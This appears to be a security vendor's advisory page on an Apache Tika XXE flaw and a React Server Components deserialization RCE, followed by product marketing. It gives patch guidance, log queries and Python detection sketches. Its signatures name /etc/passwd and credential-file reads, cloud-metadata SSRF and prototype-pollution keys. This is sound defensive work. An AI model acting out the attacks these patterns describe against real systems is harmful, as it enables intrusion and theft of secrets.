The critical nature of this vulnerability is amplified by Apache Tika's typical deployment pattern. Many applications automatically process uploaded documents for indexing, preview generation, or content extraction. In such environments, simply uploading a malicious PDF is sufficient to trigger the vulnerability; no user interaction or authentication beyond upload access is required.
Affected Products
Vulnerable Versions:
Apache Tika core (org.apache.tika:tika-core): 1.13 through 3.2.1
Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module): 2.0.0 through 3.2.1
Apache Tika parsers (org.apache.tika:tika-parsers): 1.13 through 1.28.5 (all versions before 2.0.0)
Patched Versions:
Apache Tika core: 3.2.2 or later
Apache Tika parsers: 2.0.0 or later (for 1.x users)
Critical Clarification:
The scope expansion in CVE-2025-66516 addresses two key oversights from the original CVE-2025-54988 disclosure. First, while the PDF parser module was identified as the entry point, the actual vulnerability exists in tika-core. Organizations that upgraded tika-parser-pdf-module but not tika-core to version 3.2.2 or later remain vulnerable. Second, in Tika's 1.x release series, the PDF parser was bundled within the tika-parsers module rather than as a separate artifact. These legacy deployments were not explicitly called out in the initial advisory.
Indicators of Compromise
Organizations should immediately review logs for exploitation attempts targeting document processing endpoints. The vulnerability is exploited through malicious PDF uploads containing crafted XFA content.
Attack Signatures:
PDF uploads with XFA content containing external entity declarations (DOCTYPE with SYSTEM or PUBLIC identifiers)
Unusual file access patterns from Tika processes, particularly reads to sensitive files like /etc/passwd, configuration files, or credential stores
Outbound network connections from Tika processes to unexpected destinations, especially cloud metadata endpoints or internal network ranges
Resource exhaustion patterns indicating entity expansion attacks, such as memory spikes or CPU saturation during PDF processing
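The first signature above (DOCTYPE with SYSTEM or PUBLIC identifiers) can be pre-filtered before documents reach Tika. A minimal sketch of a crude byte-level scan of an uploaded file; it is deliberately conservative and is not a substitute for patching, since XFA content inside compressed PDF object streams would be invisible to a plain scan (decompression would be needed first, which this sketch does not attempt).

```python
import re

# DOCTYPE declarations carrying SYSTEM or PUBLIC external identifiers,
# and raw ENTITY declarations, are hallmarks of an XXE payload in
# embedded XFA content.
XXE_PATTERN = re.compile(rb"<!DOCTYPE[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)
ENTITY_PATTERN = re.compile(rb"<!ENTITY\b", re.IGNORECASE)

def looks_like_xxe(pdf_bytes: bytes) -> bool:
    """Flag uploads whose raw bytes contain external-entity markup.

    XFA inside compressed streams will NOT be caught by this scan;
    treat a False result as "not obviously bad", never as "safe".
    """
    return bool(XXE_PATTERN.search(pdf_bytes) or
                ENTITY_PATTERN.search(pdf_bytes))
```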
Log Search Queries:
Application logs: Errors mentioning "EntityExpansionException", "DOCTYPE", or "ENTITY" during PDF processing
Network logs: Outbound HTTP requests from application servers to internal IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) or cloud metadata services (169.254.169.254)
File system audit logs: Unexpected file access by the Tika process or application server user, particularly to system files or configuration directories
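The network-log query above reduces to an address-range check. A minimal sketch using Python's `ipaddress` module to classify an outbound destination as private-range or cloud-metadata; the ranges match the query above, and the function name is illustrative.

```python
import ipaddress

# RFC 1918 private ranges plus the link-local cloud metadata address,
# matching the log-search guidance above.
PRIVATE_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]
METADATA_IP = ipaddress.ip_address("169.254.169.254")

def is_suspect_destination(ip_str: str) -> bool:
    """Flag outbound destinations an SSRF via Tika might target."""
    ip = ipaddress.ip_address(ip_str)
    return ip == METADATA_IP or any(ip in net for net in PRIVATE_NETS)
```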
Post-Exploitation Indicators:
Data exfiltration through external entity references to attacker-controlled servers
Lateral movement attempts from compromised document processing infrastructure
Modified or newly created files in web directories without corresponding deployments
Unauthorized access to internal services discovered through SSRF exploitation
Organizations identifying these indicators should immediately initiate incident response procedures and conduct comprehensive forensic analysis.
Recommendations
Organizations using Apache Tika must take immediate action to address this critical vulnerability.
Immediate Actions:
Upgrade tika-core to version 3.2.2 or later. This is mandatory regardless of your tika-parser-pdf-module version.
For organizations running Tika 1.x, upgrade tika-parsers to version 2.0.0 or later.
Verify all three artifacts (tika-core, tika-parser-pdf-module, tika-parsers) are at safe versions in a coordinated manner.
If using Apache Tika as a transitive dependency through other libraries, audit your dependency tree and ensure all Tika components are updated.
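For Maven-based builds, the coordinated upgrade above can be expressed by pinning the artifacts explicitly. A sketch of a `pom.xml` fragment using the patched version named in this advisory; confirm the exact released artifact versions against the official advisory, and note that transitive pins may also require a `dependencyManagement` section.

```xml
<!-- Pin tika-core to the patched line; the fix lives here, not
     only in the PDF parser module. -->
<dependency>
  <groupId>org.apache.tika</groupId>
  <artifactId>tika-core</artifactId>
  <version>3.2.2</version>
</dependency>
<dependency>
  <groupId>org.apache.tika</groupId>
  <artifactId>tika-parser-pdf-module</artifactId>
  <version>3.2.2</version>
</dependency>
```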
Risk Assessment:
Identify all applications processing untrusted PDF documents, particularly public-facing upload endpoints, email attachment processors, and document management systems.
Map Tika deployments to understand potential blast radius, including systems with access to sensitive data or internal networks.
Review network segmentation to determine if exploited Tika instances could reach critical internal resources.
Immediate Workarounds (if patching is not immediately feasible):
Disable PDF parsing capability entirely by removing or excluding the PDF parser from your Tika configuration.
Implement strict input validation and sanitization for uploaded files, though note this is not a complete mitigation.
Deploy network-level controls to prevent Tika processes from making outbound connections or accessing sensitive internal resources.
Consider processing untrusted documents in isolated, sandboxed environments with minimal privileges and network access.
Detection and Monitoring:
Implement real-time monitoring for PDF processing operations, with alerts for unusual patterns such as external entity references or unexpected network activity.
Deploy file system monitoring to detect unauthorized access from Tika processes.
Enable comprehensive logging for all document processing workflows, including full request payloads where feasible.
Establish baseline behavior for legitimate document processing to identify anomalous activity.
Response Planning:
Prepare incident response procedures for potential exploitation, including system isolation steps and forensic log collection requirements.
Review privilege levels for Tika processes and implement least-privilege principles to limit potential impact.
Consider implementing defense-in-depth measures including Web Application Firewalls (WAF) with XXE detection rules, though these should not replace patching.
Conclusion
CVE-2025-66516 represents a maximum-severity vulnerability in one of the most widely deployed document processing frameworks. With a CVSS score of 10.0, unauthenticated remote exploitation, and broad impact across multiple Apache Tika artifacts, this vulnerability demands immediate attention from every organization using Tika for document processing.
The expansion of scope beyond the original CVE-2025-54988 highlights the complexity of modern dependency chains and the critical importance of comprehensive patching strategies. Organizations cannot assume that addressing a single component in a modular framework provides complete protection; the underlying shared libraries must also be secured.
Security teams should recognize that document processing represents a critical attack surface in modern applications. Systems that automatically parse, analyze, or extract content from user-supplied files are inherently exposed to content-based attacks like XXE. This vulnerability should serve as a catalyst for broader security improvements in document processing pipelines, including proper input validation, sandboxing, network segmentation, and comprehensive monitoring.
Abstract Security Threat Research Organization (ASTRO)
Critical React Server Components RCE (CVE-2025-55182): What You Need to Patch Now
Background
On December 3, 2025, the React team disclosed CVE-2025-55182, a critical remote code execution vulnerability in React Server Components (RSC) rated CVSS 10.0. The vulnerability affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0, as well as frameworks that implement RSC, most notably Next.js versions 14.3.0-canary through 16.x.
The vulnerability was discovered and reported by security researcher Lachlan Davidson on November 29, 2025, through Meta's Bug Bounty program. By November 30, Meta security researchers confirmed the issue, and the React team immediately began coordinating with affected hosting providers and open-source projects to roll out fixes before public disclosure.
The attack vector is unauthenticated and remote, requiring only a specially crafted HTTP request to achieve full remote code execution. Critically, the vulnerability exists in the default configuration of affected applications, meaning standard deployments are immediately exploitable without any misconfigurations.
Technical Details
The vulnerability resides in the react-server package and its handling of the RSC "Flight" protocol, specifically in how React decodes payloads sent to React Server Function endpoints. The flaw is characterized as a logical insecure deserialization vulnerability in which the server processes RSC payloads without proper validation.
React Server Functions allow clients to call functions on a server by translating client requests into HTTP requests that are forwarded to server-side endpoints. On the server, React deserializes these HTTP requests into function calls and returns data to the client. An attacker can craft a malicious, malformed payload that, when deserialized by React, fails structural validation checks. This allows attacker-controlled data to influence server-side execution logic, resulting in the execution of arbitrary JavaScript code with server privileges.
The vulnerability affects not just applications with explicit React Server Function endpoints, but any application that supports React Server Components. This broad attack surface is particularly concerning given that many developers may not realize their applications are vulnerable simply by using RSC features.
The fix, merged in pull request #35277, synchronizes the FlightReplyServer (client-to-server) implementation with improvements previously made to ReactFlightClient (server-to-client). These changes address deep resolution of cycles and deferred error handling issues that enabled the insecure deserialization path.
Affected Products and Exploitation
Vulnerable Versions:
React: 19.0, 19.1.0, 19.1.1, 19.2.0
Next.js: 14.3.0-canary, 15.0 through 15.5.6, 16.0 through 16.0.6
Any framework bundling react-server: Vite RSC plugin, Parcel RSC plugin, React Router RSC preview, RedwoodJS, Waku
Organizations should immediately review logs for exploitation attempts targeting React Server Function endpoints. Exploitation leverages prototype pollution in JSON payloads sent to common endpoints including /_next/server/endpoint (Next.js) and /react-server-function (generic RSC implementations).
Attack Signatures:
POST requests with JSON payloads containing __proto__, constructor, or prototype keys
Requests to server function endpoints with unusual, nested object structures
200 OK responses to malformed payloads that should have returned errors
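The payload signature above can be checked with a recursive scan over a parsed JSON body. A minimal sketch, assuming the body has already been parsed with a JSON library (which, unlike deserializing into live JavaScript objects, leaves `__proto__` as an ordinary dictionary key); intended as a WAF-style heuristic for flagging requests, not a replacement for upgrading React.

```python
import json

# Keys characteristic of prototype-pollution payloads targeting the
# RSC Flight deserializer.
SUSPICIOUS_KEYS = {"__proto__", "constructor", "prototype"}

def has_pollution_keys(node) -> bool:
    """Recursively check a parsed JSON value for suspicious keys."""
    if isinstance(node, dict):
        if SUSPICIOUS_KEYS & node.keys():
            return True
        return any(has_pollution_keys(v) for v in node.values())
    if isinstance(node, list):
        return any(has_pollution_keys(v) for v in node)
    return False

def flag_request_body(raw_body: str) -> bool:
    """Return True if the JSON body should be flagged for review."""
    try:
        return has_pollution_keys(json.loads(raw_body))
    except json.JSONDecodeError:
        return False  # non-JSON bodies are out of scope here
```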
Log Search Queries:
Web server logs: POST AND (/_next/server/ OR /react-server-function) AND __proto__
Application logs: Errors containing "prototype" or "constructor" during deserialization
Process logs: Unexpected child processes spawned by Node.js/web server
Post-Exploitation Indicators:
Unexpected outbound connections from web application servers
New files in web directories without corresponding deployments
Unusual process executions from Node.js processes
Lateral movement attempts from web server infrastructure
Organizations identifying these indicators should immediately initiate incident response procedures, including system isolation and comprehensive forensic analysis.
Recommendations
Organizations using React Server Components must take immediate action:
Immediate Actions:
Upgrade React to versions 19.0.1, 19.1.2, or 19.2.1 immediately. This is the only definitive mitigation.
Upgrade Next.js to patched versions (14.3.0-canary.88, 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7) based on your current version.
For other RSC-enabled frameworks (RedwoodJS, Waku, React Router, etc.), check official channels for updates and patch immediately.
Risk Assessment:
Audit all applications to identify those using React Server Components or Server Functions.
Review application deployment architecture to determine if WAF protections are in place.
If using Cloudflare, verify that Managed Rules are enabled (rule IDs 33aa8a8a948b48b28d40450c5fb92fba for Managed Ruleset, 2b5d06e34a814a889bee9a0699702280 for Free Ruleset).
Detection and Monitoring:
Deploy real-time monitoring for POST requests to React Server Function endpoints (/_next/server/endpoint, /react-server-function, and any custom server action routes).
Implement content inspection for JSON payloads containing __proto__, constructor, or prototype keys in requests to server function endpoints.
Enable comprehensive logging for all web application traffic, including request payloads where feasible, with specific attention to Content-Type: application/json requests.
Implement alerting for server-side errors, unusual code execution patterns, and unexpected outbound connections from web processes.
Review historical web server logs for POST requests to server function endpoints that may indicate reconnaissance or exploitation attempts prior to patching.
Establish baseline behavior for legitimate server function usage to identify anomalous request patterns.
Response Planning:
Prepare incident response procedures for potential exploitation, including forensic log collection and system isolation steps.
Review code execution context for all React Server Functions to understand potential impact of successful RCE.
Consider temporary network segmentation for vulnerable applications that cannot be immediately patched.
Conclusion
CVE-2025-55182 represents a critical vulnerability in one of the most widely deployed web frameworks in the modern JavaScript ecosystem. With a CVSS score of 10.0, unauthenticated remote code execution, and a default-vulnerable configuration, this flaw demands immediate attention from every organization running React Server Components.
Security teams must recognize that modern web frameworks, while enabling rapid development, introduce complex server-side execution contexts that expand the attack surface significantly. React Server Components blur the line between client and server, and vulnerabilities in this boundary represent critical risks.
Organizations should treat this disclosure as a forcing function to audit their entire application stack for similar server-side deserialization vulnerabilities. The patterns that enabled this React vulnerability (insufficient validation of client-controlled data, complex deserialization logic, and privileged execution contexts) exist across many frameworks and custom application code. Comprehensive logging, real-time monitoring, and detection rules tuned to identify deserialization attacks must become standard practice.
Abstract Security Threat Research Organization (ASTRO)
Download the 2025 Security Data Pipeline Platforms Market Guide
This essential report provides a deep dive into the latest trends, key players, and technology innovations shaping the security data pipeline landscape.
Put your team’s focus back on catching attackers and let Abstract handle the heavy lifting of security data management. Our real-time streaming approach gives teams the breathing room to prioritize their security effectiveness instead.
Stop attacks in progress, not after the fact: Reduce Mean Time to Detect threats from hours to seconds with Abstract. Identify lateral movement, privilege escalation, and data exfiltration within the critical 43-minute adversary breakout window.
Send only high-fidelity alerts, not raw telemetry: Dramatically reduce ingestion volumes and licensing costs by processing detection logic in the stream.
With Abstract, you can enrich events in real time using GeoIP, threat feeds, identity, vulnerability, asset data, and user context - giving every signal the depth needed for faster, smarter detection.
Extend your detection surface beyond infrastructure and into the SaaS layer. Most tools stop at cloud infrastructure—Abstract goes further. It captures rich security telemetry from SaaS platforms like Google Workspace, Microsoft 365, Salesforce, GitHub, and Slack.
Abstract unifies security data across cloud, SaaS, and on-prem sources—eliminating blind spots caused by fragmented tools, missing logs, and delayed detection. See everything, in real time, from a single pipeline.
Streamline audit trails across all systems: Automatically enrich and correlate compliance-relevant events, making audits faster and more accurate.
Testimonials
“Time is our most valuable resource. Abstract gives us time back — in deployment, in operations, in impact.”
Pablo Quiros,
VP & Global Head of Security and Information Technology - CISO, Juul Labs
“This isn’t just another tool — it’s a true force multiplier. Abstract has helped us rethink how we approach security operations, allowing us to be proactive rather than reactive.”
Pablo Quiros,
VP & Global Head of Security and Information Technology - CISO, Juul Labs
“Abstract Security has completely redefined security platforms.”
Jonathan Kovacs,
CEO, OmegaBlack
“There had been multiple attempts to build visibility into our systems. What we inherited was outdated, overlapping, and broken logging infrastructure.”
Pablo Quiros,
VP & Global Head of Security and Information Technology - CISO, Juul Labs
One Platform For All Your Security Data Operations